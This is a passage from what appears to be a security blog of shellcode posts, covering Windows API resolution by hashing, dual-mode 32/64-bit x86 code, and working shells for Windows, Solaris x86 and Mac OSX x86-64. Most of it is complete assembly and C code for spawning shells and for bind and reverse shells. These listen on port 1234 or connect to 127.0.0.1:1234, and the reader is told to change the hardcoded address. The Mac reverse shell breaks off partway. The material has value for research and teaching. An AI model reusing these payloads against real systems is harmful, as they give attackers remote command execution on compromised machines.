    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink  
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
    ; NOTE(review): nothing in this listing jumps to gapi_l1
gapi_l1:
    push   edx                ; keep 30h, edx is the hash accumulator below
    movzx  ecx, word[edi+44]  ; ecx = BaseDllName.Length
    mov    esi, [edi+48]      ; esi = BaseDllName.Buffer
    shr    ecx, 1             ; length in bytes -> number of 16-bit characters
    xor    eax, eax
    cdq                       ; edx = 0, initial hash
gapi_l2:
    lodsw                     ; next character of the name
    or     al, 0x20           ; convert to lowercase
    ror    edx, 13
    add    edx, eax
    loop   gapi_l2
    ; target DLL?
    cmpms  "advapi32.dll"
    pop    edx                ; restore 30h; pop leaves the flags of the cmp intact
    jne    gapi_l0    
   
    ; we have target DLL, now search for kernel32.dll
    ; in import directory
    ; edx += IMAGE_DOS_HEADER.e_lfanew
    add    edx, [ebx+3ch]  
    ; edx = e_lfanew + 30h, so +50h reads offset 80h of the NT headers:
    ; the RVA of the import directory
    mov    esi, [ebx+edx+50h]
    add    esi, ebx         ; esi = first import descriptor
imp_l0:
    ; read one 20-byte descriptor; esi ends up on the next one
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx         ; store in edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]   ; first 4 characters of the DLL name
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4] ; next 4 characters of the DLL name
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
 
    ; locate GetProcAddress
    mov    ecx, 'GetP'       ; name bytes 0..3
    mov    edx, 'ddre'       ; name bytes 8..11
    call   get_imp
    push   eax               ; save pointer 
    
    ; locate LoadLibraryA
    mov    ecx, 'Load'       ; name bytes 0..3
    mov    edx, 'aryA'       ; name bytes 8..11
    call   get_imp
    pop    ebp               ; ebp = GetProcAddress
    xchg   eax, ebx          ; ebx = LoadLibraryA
    
    pop    edi
    pop    esi
    ret

    ; -------------
    ; get_imp
    ;   in : ebx = image base
    ;        ebp = OriginalFirstThunk RVA, edi = FirstThunk RVA
    ;        ecx = name bytes 0..3, edx = name bytes 8..11 of the wanted API
    ;   out: eax = value of the matching FirstThunk slot,
    ;        or 0 when the end of the thunk array is reached first
    ;   esi and edi are restored, so the routine can be called again with
    ;   the same descriptor.
get_imp:
    push   esi
    push   edi
    lea    esi, [ebp+ebx]     ; esi = OriginalFirstThunk + base
    add    edi, ebx           ; edi = FirstThunk + base
gi_l0:
    lodsd                     ; eax = oft->u1.Function, oft++;
    scasd                     ; ft++;
    test   eax, eax
    jz     gi_l1              ; end of thunk array: return with eax = 0
    js     gi_l0              ; skip ordinals (high bit set)
    
    ; +2 skips the 2 bytes in front of the name in the import-by-name entry
    cmp    dword[eax+ebx+2], ecx
    jnz    gi_l0

    cmp    dword[eax+ebx+10], edx
    jnz    gi_l0
    
    ; edi was already advanced by scasd, so the matching slot is at edi-4
    mov    eax, [edi-4]       ; eax = ft->u1.Function
gi_l1:
    pop    edi
    pop    esi
    ret

Summary

The current sizes of the codes are listed below, although they may shrink/expand in the future.

Type x86 Size
GPA 99
LLAGPA 127
Extern GPA 140
Extern LLAGPA 170
Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , , , , | Leave a comment

Shellcode: Dual mode PIC for x86 (Reverse and Bind Shells for Windows)

Introduction

In a nutshell, we’re mixing 32 and 64-bit x86 opcodes so that regardless of the operating system mode (legacy or long), our Position Independent Code (PIC) will still execute successfully. Although some of the code requires conditional jumps, we try to avoid these wherever possible.

Writing code to run on both 32 and 64-bit windows has usually required 2 entirely different source codes. The exception was when Peter Ferrie published code to execute calc.exe in both CPU modes. Here we try to extend his idea for a connect and bind shell.

Searching for API addresses in the export table uses a similar approach to Peter’s code using conditional jumps.

Because of the different calling conventions (Microsoft x64 vs stdcall) and number of parameters for each API, the actual call to an API is made from separate pieces of code we refer to as “dispatchers”.

The resulting code is not 100% dual mode but it’s possible using a different approach to what’s shown here. The reason I don’t discuss a 100% dual mode assembly is because it requires more space.

Linux

Here’s a simple dual mode x86 shellcode for Linux just to show how easy it is. 😉

shx

Calling Conventions

32-bit Windows API use Standard Calling convention (stdcall). 64-bit Windows API use Microsoft x64 calling convention which is similar to fastcall or the AMD64 ABI used by Linux/BSD/OSX.

  • Legacy Mode (32-bit)

With stdcall, all parameters to a function are placed on the stack (normally using the PUSH instruction). Before returning to caller, the callee removes parameters (normally using RETN instruction). For cdecl convention, you’ll normally see stack fixed by caller using ADD instruction.

Registers EAX, ECX and EDX are volatile and should be presumed destroyed by function calls.

Registers EBX, ESI, EDI and EBP are non-volatile and must be saved and restored by any function that uses them.

  • Long Mode (64-bit)

The first 4 parameters are placed in RCX, RDX, R8 and R9 in that order. The remaining are placed on the stack. For MSVC compiler, the 5th and any additional parameters are normally stored in stack space using the MOV instruction so as to avoid stack misalignment. The callee does not need to alter the stack before returning.

Registers RAX, RCX, RDX, R8, R9, R10, R11 are volatile and should be presumed destroyed by function calls.

Registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are non-volatile and must be saved and restored by any function that uses them.

Mode detection

Detecting between 2 modes can be achieved using REX prefixes and the flags register, specifically status flags that can be used to make decisions, thus controlling the flow of execution.

Although both NASM and YASM assemblers provide the operand size prefix o64 which is essentially emitting 0x48 at assembly time, we don’t use that here.

flags

The x64 prefix 0x48 which is also a 32-bit opcode for ‘DEC EAX’ will affect the Sign Flag (SF) if EAX is initially zero. Setting EAX to zero first using SUB/XOR/AND will also set the Zero Flag (ZF) to 1.

Actually, even if EAX is not zero before DEC EAX, so long as the result is signed (0x80000000 and above) SF will still be 1. You can also play around with various other conditional jumps; JL/JG for example.

For this code, we’ll perform conditional jumps based on ZF and SF flags.

Jump if Not Zero (JNZ) or Jump if Zero (JZ).

If testing the result of REX prefix, we use Jump if Not Sign (JNS) or Jump if Sign (JS).

There are probably lots of ways to detect between modes so don’t limit your own code to this one approach.

Take the following code when executed in 32-bit mode.

; mode test as seen by a 32-bit CPU ("dec eax" is the single byte 0x48)
    xor    eax, eax     ; eax = 0, sets ZF = 1
    dec    eax          ; 32-bit: SF = 1 and ZF = 0; 64-bit: read as a prefix, flags unchanged
    js     x32          ; taken in 32-bit mode only

First, we set the Zero Flag (ZF) to 1 with XOR EAX, EAX. The CPU will then follow through with the jump to x32 because the result of ‘DEC EAX’ will set SF to 1 and ZF to 0. You could alternatively use JNZ instead of JS; both are fine. If jumping to x64 code, you can use JZ or JNS.

In 64-bit mode however, the CPU will ignore the jump because “DEC EAX” or 0x48 is of course a prefix used for 64-bit operations and so the Sign Flag (SF) is unaffected and ZF remains 1.

We need to avoid using EAX when possible. It’s typically only used in final code for detection purposes. You can also use ‘INC EAX’ to affect flags register which is what you see used in the Linux shellcode above.

Home space for 64-bit mode

When you call an API in 64-bit mode, the OS expects 32 bytes of free stack sometimes referred to as home space or Shadow Space depending on who you talk to. It will optionally save RCX, RDX, R8 and R9 here.

x64_hs

When the OS attempts to access API parameters, it will expect them at [rsp+40] or [rsp+28h] as illustrated. 32 bytes are for home space and 8 for return address.

Stack and Structure alignment

For 64-bit mode, the stack pointer must be aligned on a 16-byte boundary at the point where an API is called so that SSE2 instructions execute without causing exceptions. The call itself then pushes an 8-byte return address, so on entry to the API the stack sits 8 bytes off a 16-byte boundary, which is exactly what the callee expects.

Since we’re dealing with both stdcall and Microsoft x64 calling conventions, I’ve opted to push all parameters on the stack and then use a separate piece of code for 64-bit mode.

Structures for 64-bit code obviously have to be aligned by 8 bytes. Although the assembly code does not define any structures, it’s important to know the offset of each field in a structure for both 32 and 64-bit mode.

STARTUPINFO for example defines 2 WORD values (wShowWindow and cbReserved2) which are aligned by 8 as you can see by offset of the lpReserved2 field.

// Field offsets are given as "32-bit layout or 64-bit layout".
// Pointer and HANDLE members are 4 bytes wide in 32-bit mode and 8 bytes
// wide in 64-bit mode, which is why the two columns drift apart.
typedef struct _STARTUPINFOA {
    DWORD   cb;              //  +0 or  +0
    LPSTR   lpReserved;      //  +4 or  +8
    LPSTR   lpDesktop;       //  +8 or +16
    LPSTR   lpTitle;         // +12 or +24
    DWORD   dwX;             // +16 or +32
    DWORD   dwY;             // +20 or +36
    DWORD   dwXSize;         // +24 or +40
    DWORD   dwYSize;         // +28 or +44
    DWORD   dwXCountChars;   // +32 or +48
    DWORD   dwYCountChars;   // +36 or +52
    DWORD   dwFillAttribute; // +40 or +56
    DWORD   dwFlags;         // +44 or +60
    WORD    wShowWindow;     // +48 or +64
    WORD    cbReserved2;     // +50 or +66  <-- alignment adds 4 (64-bit: next field starts at +72, not +68)
    LPBYTE  lpReserved2;     // +52 or +72
    HANDLE  hStdInput;       // +56 or +80
    HANDLE  hStdOutput;      // +60 or +88
    HANDLE  hStdError;       // +64 or +96
} STARTUPINFOA, *LPSTARTUPINFOA;

Resolving and executing API

For those of you unfamiliar with this process, please refer to Resolving API addresses in memory.

Although I’ve followed the same idea in this code here where API hashes and additional parameters are accessed through ESI, I may not use this in future. The function to call an API is stored in EBP.

An additional parameter count is stored before the API hash for the x64 dispatcher when pop’ing arguments into RCX, RDX, R8 and R9. We also have to release arguments on the stack after call since Microsoft x64 does not do this but stdcall does.

Here’s what the 32-bit source in x84.asm looks like when working with the PE Export Directory.

x84_asm

Now look at both disassemblies for each mode, first 32-bit which is essentially same as source above.

x32_dis

Then 64-bit

x64_dis

The ‘DEC EAX’ simply turns some opcodes into 64-bit operations when running under 64-bit mode but still works fine under 32-bit mode provided we avoid using EAX as much as possible.

When writing dual mode assembly like this, just imagine EAX doesn’t really exist as a general purpose register and ‘DEC EAX’ is merely an instruction to tell CPU you want the next operation to be 64-bit.

Advancing buffer by 4 or 8 bytes

As you can see from the STARTUPINFO structure above, some data types are 64-bit. When assigning our socket handle to hStdInput, hStdOutput and hStdError, we need to advance the buffer position by 8 bytes.

But in 32-bit mode, we only need to advance 4 so we can of course use conditional jumps for this but instead, we store the socket handle in EBX/RBX, the pointer to memory in EDI/RDI and then use a prefix before SCASD which then adds 4 or 8 depending on CPU mode.

Since we need to avoid using EAX, we can’t use STOSQ which would have DEC EAX prefixed to regular STOSD instruction.

; store the socket handle in hStdInput, hStdOutput and hStdError
; ebx = socket handle, edi = pointer to si.hStdInput
; NOTE(review): "mov cl, 3" assumes the rest of ecx is zero - confirm at the call site
    mov    cl, 3       ; three handle fields to fill
rc_l6x:    
    mov    [edi], ebx  ; si.hStdInput  = s (only 32 bits are written)
    dec    eax         ; advance 4 or 8 depending on mode
    scasd              ; used only to advance edi: scasd in 32-bit mode, scasq with the prefix
    loop   rc_l6x
//
  /* 01AE */ "\xb1\x03"    /* mov cl, 0x3         */
  /* 01B0 */ "\x89\x1f"    /* mov [rdi], ebx      */
  /* 01B2 */ "\x48\xaf"    /* scasq               */
  /* 01B4 */ "\xe2\xfa"    /* loop 0x1b0          */

The potential problem with this might be if a socket handle returned by WSASocketA occupies more than 32-bits on a 64-bit system.

Reverse shell

So finally here’s a snippet of C code for a simple reverse shell on windows that performs no error checking. Compile this with MSVC or MINGW and use NETCAT or the more advanced NCAT to setup a TCP listener on localhost:1234.

//
  // Reverse shell: connect to 127.0.0.1:1234, then start "cmd" with its
  // standard handles set to the socket. No return value is checked.
  PROCESS_INFORMATION pi;
  STARTUPINFO         si;
  WSADATA             wsa;
  SOCKET              s;
  struct sockaddr_in  sa;
  u_long              ip;
    
  // initialise Winsock, requesting version 2.0
  WSAStartup (MAKEWORD(2, 0), &wsa);
  
  // TCP socket created through WSASocket rather than socket()
  s=WSASocket (AF_INET, SOCK_STREAM, 
      IPPROTO_IP, NULL, 0, 0);

  // destination address, already in network byte order
  ip = inet_addr ("127.0.0.1"); 
    
  sa.sin_family = AF_INET;
  sa.sin_port   = htons(1234);
  
  memcpy ((void*)&sa.sin_addr, 
      (void*)&ip, sizeof(ip));
    
  connect(s, (struct sockaddr*)&sa, sizeof(sa));

  // start from an all-zero STARTUPINFO so unused fields are 0/NULL
  memset ((void*)&si, 0, sizeof(si));

  // STARTF_USESTDHANDLES makes the three hStd* fields take effect;
  // all of them are set to the connected socket
  si.cb         = sizeof(si);
  si.dwFlags    = STARTF_USESTDHANDLES;
  si.hStdInput  = (HANDLE)s;
  si.hStdOutput = (HANDLE)s;
  si.hStdError  = (HANDLE)s;

  // bInheritHandles is TRUE so the child receives the socket handle
  CreateProcess (NULL, "cmd", NULL, NULL, 
    TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);

  // block until the shell exits, then release everything
  WaitForSingleObject (pi.hProcess, INFINITE);
  
  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  
  closesocket (s);

Demonstration

You can run a demo using Process Injector tool included.

Here’s a screenshot of Windows NT 4.0 with the bind shell running inside notepad.

bind_nt

And here’s me connecting with ncat.

winnt

Summary

The most difficult part of writing code like this is dealing with the different calling conventions.

An exercise left up to the reader would be writing something that entirely avoids using x64 registers which are used in the x64 dispatcher here.

See source codes here for both bind/reverse shells and any future updates.

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 1 Comment

Shellcode: Solaris x86

Introduction

I wasn’t going to discuss these but they might be useful as a reference for anyone attempting to write shellcodes for Solaris on x86.

Existing x86 codes I found online are outdated and don’t work anymore so these were written from scratch and as of now do work with latest release. If you just want sources, see here.

If you’re writing codes like this from scratch, truss and gdb are both useful to hunt down potential problems. I’ve used yasm to write these sources because AT&T syntax hurts my eyes and brain. It will hurt yours too, take my word for it.

There’s a yasm package available for Solaris through pkg but surprisingly none for nasm.

execve

Most Linux heads will be familiar with execve function. For whatever reason, the copy of Solaris I have just wouldn’t work unless I provided additional null parameter.

int execve(const char *filename, char *const argv[],
           char *const envp[]);
;
    ; execve("/bin//sh", {"/bin//sh", NULL}, 0, 0)
    ; Arguments are pushed right to left, followed by one extra dword
    ; that stands in for a return address, then int 0x91 enters the
    ; kernel with the system call number in eax.
    push    0x3b
    pop     eax         ; eax = 0x3b (59), sys_execve
    cdq                 ; edx = 0
    push    edx         ; '\0'
    push    '//sh'      ; second half of the path string
    push    '/bin'      ; first half of the path string
    mov     ebx, esp    ; ebx = "/bin//sh", 0
    push    edx         ; NULL
    push    ebx         ; "/bin//sh", 0
    mov     ecx, esp    ; ecx = argv
    push    edx         ; 0, the additional null parameter
    push    edx         ; 0, envp
    push    ecx         ; argv 
    push    ebx         ; "/bin//sh", 0
    push    edx         ; placeholder return address
    int     0x91

Execute command

Same as first code except we supply “-c” and command in argv[] array.

;
    ; execve("/bin//sh", {"/bin//sh", "-c", cmd, NULL}, 0, 0)
    ; The command string is expected to follow the CALL at l_cmd; the
    ; return address that CALL pushes is therefore the pointer to the
    ; command and lands in the argv[2] position.
    push    0x3b
    pop     eax         ; eax = sys_execve
    cdq                 ; edx = 0
    push    edx         ; '\0'
    push    '//sh'      ; "hs//"
    push    '/bin'      ; "nib/"
    mov     ebx, esp    ; ebx = "/bin//sh", 0
    push    edx         ; '\0'
    push    word '-c'   ; 2-byte push, terminated by the zero dword above
    mov     edi, esp    ; edi = "-c", 0
    push    edx         ; NULL, terminates argv
    jmp     l_cmd       ; go fetch the address of the command string
r_cmd:                  ; top of stack = address of command = argv[2]
    push    edi         ; "-c", 0    
    push    ebx         ; "/bin//sh", 0
    mov     ecx, esp    ; ecx = argv
    push    edx         ; 0, the additional null parameter
    push    edx         ; 0, envp
    push    ecx         ; argv 
    push    ebx         ; "/bin//sh", 0
    push    edx         ; placeholder return address
    int     0x91
l_cmd: 
    call    r_cmd       ; pushes the address of the bytes that follow
    ; put your command here followed by null terminator

Bind shell to port

One thing to mention about binding shell to a port is that dup2 system call for whatever reason isn’t available so we emulate it using close and fcntl

This just listens on port 1234 for incoming connection and spawns /bin/sh

;
    ; Build struct sockaddr_in on the stack. Both constants are stored
    ; inverted and flipped back with NOT (presumably so the encoded
    ; instructions contain no zero bytes).
    mov    eax, ~0x00000000 & 0xFFFFFFFF
    mov    edx, ~0xD2040002 & 0xFFFFFFFF
    not    eax
    not    edx
    push   eax          ; sa.sin_addr = ADDR_ANY
    push   edx          ; sa.sin_port = 1234, sa.sin_family=AF_INET
    mov    edi, esp     ; edi = &sa
    
    ; Every call below pushes its arguments right to left, then one
    ; extra dword standing in for a return address, and uses int 0x91.
    ; The socket calls never pop their frames, so they stay on the stack.

    ; step 1
    ; so_socket (AF_INET, SOCK_STREAM, IPPROTO_IP);
    xor    ebx, ebx
    mul    ebx          ; eax = 0, edx = 0
    mov    al, 2        ; eax = 2, reused for every argument that is 2
    push   eax          ; sov_sockstream
    push   edx          ; 0 (presumably the device path argument - confirm)
    push   edx          ; IPPROTO_IP
    push   eax          ; SOCK_STREAM
    push   eax          ; AF_INET
    push   eax          ; placeholder return address
    mov    al, 230      ; system call number used for so_socket
    int    0x91

    xchg   eax, ebx     ; ebx = s, eax = 0
    
    ; step 2
    ; bind (s, &sa, sizeof(sa));
    push   16
    push   edi          ; &sa
    push   ebx          ; s
    push   edx          ; placeholder return address
    mov    al, 232      ; sys_bind         
    int    0x91
    
    ; step 3, listen for incoming connections
    ; listen (s, 0);
    push   edx          ; backlog = 0
    push   ebx          ; s
    push   edx          ; placeholder return address
    mov    al, 233      ; eax=sys_listen
    int    0x91
    
    ; step 4, accept connections
    ; accept (s, 0, 0);
    ; only two arguments are pushed; the third one is the dword left on
    ; top of the stack by the listen frame above (edx)
    push   edx          ; 0
    push   ebx          ; s
    push   2            ; placeholder return address, popped into ecx below
    mov    al, 234      ; eax = sys_accept
    int    0x91
    
    ; step 5, assign socket to stdin, stdout and stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
    xchg   eax, ebx     ; ebx = r (accepted socket), eax = s
    xchg   eax, edx     ; eax = old edx (expected 0), edx = s
    cdq                 ; edx = 0 again, given eax is not negative
    pop    ecx          ; ecx = 2, the dword pushed before accept
    ; dup2 syscall #9 no longer exists
    ; so we emulate it with close() and fcntl()
    ; fildes2 in ecx
    ; fildes in ebx    
    ; edx = 0
dup2:
    ; close(fildes2);
    push   ecx          ; descriptor to replace
    push   edx          ; placeholder return address
    mov    al, 6        ; system call number used for close
    int    0x91
    ; fid = fcntl(fildes, F_DUP2FD, fildes2);
    push   ecx          ; fileno
    push   9            ; fcntl command 9 (F_DUP2FD in Solaris <sys/fcntl.h>)
    push   ebx          ; s
    push   edx          ; return address
    mov    al, 62       ; eax = sys_fcntl
    int    0x91
    add    esp, 6*4     ; drop the 2 + 4 dwords pushed in this pass
    
    dec    ecx          ; next descriptor: 2, 1, 0
    jns    dup2
    
    ; step 6
    ; execve ("/bin//sh", {"/bin//sh", NULL}, 0, 0);
    push    edx         ; '\0'
    push    '//sh'
    push    '/bin'
    mov     ebx, esp    ; ebx = "/bin//sh", 0
    push    edx         ; NULL
    push    ebx         ; "/bin//sh", 0
    mov     ecx, esp    ; ecx = argv
    push    edx         ; 0
    push    edx         ; 0
    push    ecx         ; argv
    push    ebx         ; "/bin//sh", 0
    push    edx         ; placeholder return address
    mov     al, 59      ; eax = sys_execve (rest of eax expected to be 0)
    int     0x91

Reverse connect

Setup netcat or ncat locally. Obviously need to change hardcoded ip address and port of 127.0.0.1:1234

;
    ; Build struct sockaddr_in on the stack. Both constants are stored
    ; inverted and flipped back with NOT (presumably so the encoded
    ; instructions contain no zero bytes).
    mov    eax, ~0x0100007f & 0xFFFFFFFF
    mov    edx, ~0xD2040002 & 0xFFFFFFFF
    not    eax
    not    edx
    push   eax          ; sa.sin_addr = inet_addr("127.0.0.1")
    push   edx          ; sa.sin_port = 1234, sa.sin_family=AF_INET
    mov    edi, esp     ; edi = &sa
    
    ; Every call below pushes its arguments right to left, then one
    ; extra dword standing in for a return address, and uses int 0x91.

    ; step 1, create a socket
    ; socket (AF_INET, SOCK_STREAM, IPPROTO_IP);
    xor    ebx, ebx
    mul    ebx          ; eax = 0, edx = 0
    mov    al, 2        ; eax = 2, reused for every argument that is 2
    push   eax          ; sov_sockstream
    push   edx          ; 0 (presumably the device path argument - confirm)
    push   edx          ; IPPROTO_IP
    push   eax          ; SOCK_STREAM
    push   eax          ; AF_INET
    push   eax          ; placeholder return address (2), popped below
    mov    al, 230      ; system call number used for so_socket
    int    0x91

    xchg   eax, ebx     ; ebx = s, eax = 0
    
    ; step 2, assign socket to stdin, stdout and stderr
    ; dup2 (s, FILENO_STDIN)
    ; dup2 (s, FILENO_STDOUT)
    ; dup2 (s, FILENO_STDERR)
    pop    ecx          ; ecx = 2, the last dword pushed for the socket call
    ; dup2 syscall #9 no longer seems to exist
    ; so we emulate it with close() and fcntl()
    ; fildes2 in ecx
    ; fildes in ebx    
    ; edx = 0
dup2:
    ; close(fildes2);
    push   ecx          ; descriptor to replace
    push   edx          ; placeholder return address
    mov    al, 6        ; system call number used for close
    int    0x91
    ; fid = fcntl(fildes, F_DUP2FD, fildes2);
    push   ecx          ; fileno
    push   9            ; fcntl command 9 (F_DUP2FD in Solaris <sys/fcntl.h>)
    push   ebx          ; s
    push   edx          ; return address
    mov    al, 62       ; eax = sys_fcntl
    int    0x91
    add    esp, 6*4     ; drop the 2 + 4 dwords pushed in this pass
    
    dec    ecx          ; next descriptor: 2, 1, 0
    jns    dup2
    
    ; step 3, connect to remote host
    ; connect (s, {AF_INET, 1234, 127.0.0.1}, 16);
    ; eax is the result of the last fcntl call (expected 0) and serves
    ; as the zero value from here on
    push   16
    push   edi        ; &sa
    push   ebx        ; s  
    push   eax        ; placeholder return address
    mov    al, 235    ; system call number used for connect
    int    0x91
    
    ; step 4, execute shell
    ; execve ("/bin//sh", {"/bin//sh", NULL}, 0, 0);
    ; eax is the result of connect (expected 0, not checked)
    push   eax         ; '\0'
    push   '//sh'
    push   '/bin'
    mov    ebx, esp    ; ebx = "/bin//sh", 0
    push   eax         ; NULL
    push   ebx         ; "/bin//sh", 0
    mov    ecx, esp    ; ecx = argv
    push   eax         ; 0  
    push   eax         ; 0  
    push   ecx         ; argv
    push   ebx         ; "/bin//sh", 0
    push   eax         ; placeholder return address
    mov    al, 59      ; eax = sys_execve
    int    0x91

Sources

See here

Posted in assembly, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Mac OSX x86-64

Introduction

Since Mac OSX is derived from BSD sources, I wrongly presumed the BSD codes would work without problem. 0x4d_ having a Mac was able to confirm they did not work and so we realized quickly the solution was simply setting bit 25 of EAX register using BTS instruction (Bit Test and Set).

;
    ; set bit 25: eax |= 0x02000000, which places 2 in the class byte
    bts  eax, 25

You can set alternatively using ROL/ROR/SHL.

Apple does it their way

System calls in OSX follow the AMD64 ABI except for one minor difference. The upper 8 bits of the EAX register (bits 24–31) represent the “class” of system call as described by Dustin Schultz in Mac OS X 64 Bit Assembly System Calls.

Mac OS X or likely BSD has split up the system call numbers into several different “classes.” The upper order bits of the syscall number represent the class of the system call, in the case of write and exit, it’s SYSCALL_CLASS_UNIX and hence the upper order bits are 2! Thus, every Unix system call will be (0x2000000 + unix syscall #).

The main difference between system calls on Mac OSX and BSD (which OSX is derived from) is the class. As you can see defined in syscall_sw.h

/*
 * Syscall classes for 64-bit system call entry.
 * For 64-bit users, the 32-bit syscall number is partitioned
 * with the high-order bits representing the class and low-order
 * bits being the syscall number within that class.
 * The high-order 32-bits of the 64-bit syscall number are unused.
 * All system classes enter the kernel via the syscall instruction.
 *
 * These are not #ifdef'd for x86-64 because they might be used for
 * 32-bit someday and so the 64-bit comm page in a 32-bit kernel
 * can use them.
 */
#define SYSCALL_CLASS_SHIFT	24
#define SYSCALL_CLASS_MASK	(0xFF << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK	(~SYSCALL_CLASS_MASK)

#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */	
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */

So when constructing a system call, they use the following macro defined in same header file.

#define SYSCALL_CONSTRUCT_UNIX(syscall_number) \
    ((SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | \
     (SYSCALL_NUMBER_MASK & (syscall_number)))

Spawn /bin/sh

;
    ; execve("/bin//sh", NULL, NULL)
    ; rdi = path, rsi = argv (0), rdx = envp (0),
    ; rax = 0x0200003B (class bit 25 plus system call 59)
    bits 64

    xor     esi, esi         ; esi = 0
    mul     esi              ; eax = 0, edx = 0
    bts     eax, 25          ; eax = 0x02000000
    mov     al, 59           ; rax = sys_execve
    mov     rbx, '/bin//sh'  ; the 8 path bytes, no terminator yet
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    syscall

Execute command

;
    ; execve("/bin//sh", {"/bin//sh", "-c", cmd, NULL}, NULL)
    ; The command string is expected to follow the CALL at l_cmd64; the
    ; return address that CALL pushes is the pointer to the command and
    ; lands in the argv[2] position.
    push    59
    pop     rax         ; eax = sys_execve
    cdq                 ; edx = 0
    bts     eax, 25     ; eax = 0x0200003B
    mov     rbx, '/bin//sh'
    push    rdx         ; 0
    push    rbx         ; "/bin//sh"
    push    rsp
    pop     rdi         ; rdi="/bin//sh", 0
    ; ---------
    push    rdx         ; 0
    push    word '-c'   ; 2-byte push, terminated by the zero qword above
    push    rsp
    pop     rbx         ; rbx="-c", 0
    push    rdx         ; argv[3]=NULL
    jmp     l_cmd64     ; go fetch the address of the command string
r_cmd64:                ; argv[2]=cmd
    push    rbx         ; argv[1]="-c"
    push    rdi         ; argv[0]="/bin//sh"
    push    rsp
    pop     rsi         ; rsi=argv
    syscall             ; rdx is still 0, so envp = NULL
l_cmd64:
    call    r_cmd64     ; pushes the address of the bytes that follow
    ; put your command here followed by null terminator

Bind port to shell

;
    ; Bind shell for Mac OSX x86-64: listen on TCP port 1234, accept one
    ; connection, duplicate it onto descriptors 0-2 and execve /bin//sh.
    ;
    ; struct sockaddr_in is built on the stack. The qword is stored
    ; inverted and flipped back with NOT. Bytes in memory after the push:
    ;   00 02 04 D2 00 00 00 00
    ;   sin_len = 0, sin_family = AF_INET (2), sin_port = 1234 (network
    ;   byte order), sin_addr = INADDR_ANY
    ; This is the same layout the reverse connect shell uses. The former
    ; constant 0xd2040002 put 2 into sin_len and left sin_family at 0.
    mov     rax, ~0x00000000d2040200
    not     rax
    push    rax
    
    ; rbp keeps 0x02000000 (bit 25 set) for the whole run; every call
    ; copies it to rax and then loads the call number into al
    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax              ; rax = 0x02000000
    cdq                      ; rdx = IPPROTO_IP
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET   
    mov     al, 97           ; eax = sys_socket
    syscall
    
    xchg    eax, edi         ; edi=sockfd
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    rbp
    pop     rax
    push    rsp
    pop     rsi              ; rsi = &sa (top of stack)
    mov     dl, 16           ; rdx = sizeof(sa)
    mov     al, 104          ; eax = sys_bind
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    rax
    pop     rsi              ; rsi = result of bind (expected 0) = backlog
    push    rbp
    pop     rax    
    mov     al, 106          ; eax = sys_listen
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    push    rbp
    pop     rax    
    mov     al, 30           ; eax = sys_accept
    cdq                      ; rdx = 0; rsi is still 0 from step 3
    syscall
    
    xchg    eax, edi         ; edi=r
    push    2
    pop     rsi              ; rsi = 2, first descriptor to replace
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax
    mov     al, 90           ; rax=sys_dup2
    syscall
    dec     esi              ; 2, 1, 0, then -1 ends the loop
    jns     dup_loop64       ; jump if not signed   
    
    ; step 6, execute /bin/sh
    ; execve("/bin//sh", NULL, 0);
    inc     esi              ; esi = -1 + 1 = 0, argv = NULL
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rbp
    pop     rax    
    mov     al, 59           ; rax=sys_execve
    syscall

Reverse connect shell

;
    ; Reverse connect shell for Mac OSX x86-64: connect to
    ; 127.0.0.1:1234 and execve /bin//sh on the connected socket.
    ;
    ; struct sockaddr_in is built on the stack. The qword is stored
    ; inverted and flipped back with NOT. Bytes in memory after the push:
    ;   00 02 04 D2 7F 00 00 01
    ;   sin_len = 0, sin_family = AF_INET (2), sin_port = 1234 (network
    ;   byte order), sin_addr = 127.0.0.1
    mov     rcx, ~0x0100007fd2040200
    not     rcx
    push    rcx
    
    ; rbp keeps 0x02000000 (bit 25 set) for the whole run; every call
    ; copies it to rax and then loads the call number into al
    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax
    cdq                      ; rdx=IPPROTO_IP
    push    1
    pop     rsi              ; rsi=SOCK_STREAM
    push    2
    pop     rdi              ; rdi=AF_INET  
